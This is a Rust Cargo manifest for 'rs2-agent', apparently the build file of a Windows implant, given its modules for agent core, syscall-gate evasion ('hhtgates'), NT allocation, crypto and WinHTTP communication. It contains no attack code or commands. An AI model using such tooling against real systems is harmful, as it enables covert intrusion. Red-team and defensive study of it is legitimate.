[package]
name = "rs2-agent"
version = "0.1.0"
edition = "2021"

[profile.release]
opt-level = "z"
codegen-units = 1
lto = true
strip = true
debug = false
debug-assertions = false
panic = "abort"
incremental = false

[dependencies]
rs2-communication-protocol = {path = "../libs/rs2-communication-protocol"}
mod-agentcore = {path = "../modules/mod-agentcore" }
mod-hhtgates = {path = "../modules/mod-hhtgates"}
mod-win32 = {path = "../modules/mod-win32" }
mod-ntallocator = {path = "../modules/mod-ntallocator", optional = true }
rs2-crypt = {path = "../libs/rs2-crypt"}
mod-protocol-json = {path = "../modules/mod-protocol-json", optional = true}
mod-protocol-winhttp = {path = "../modules/mod-protocol-winhttp", optional = true}
libc-print = "0.1.23"
spin = "0.9"
serde = { version = "1.0.202", features = ["derive"] }
serde_json = { version = "1.0.117" }
tokio = { version = "1", features = ["full"] }  
anyhow = "1.0.86"
rand = "0.8.5"
chrono = "0.4"

[features]
default = ["protocol-winhttp", "ntallocator"]
protocol-json = ["dep:mod-protocol-json"]
protocol-winhttp = ["dep:mod-protocol-winhttp"]
ntallocator = ["dep:mod-ntallocator"]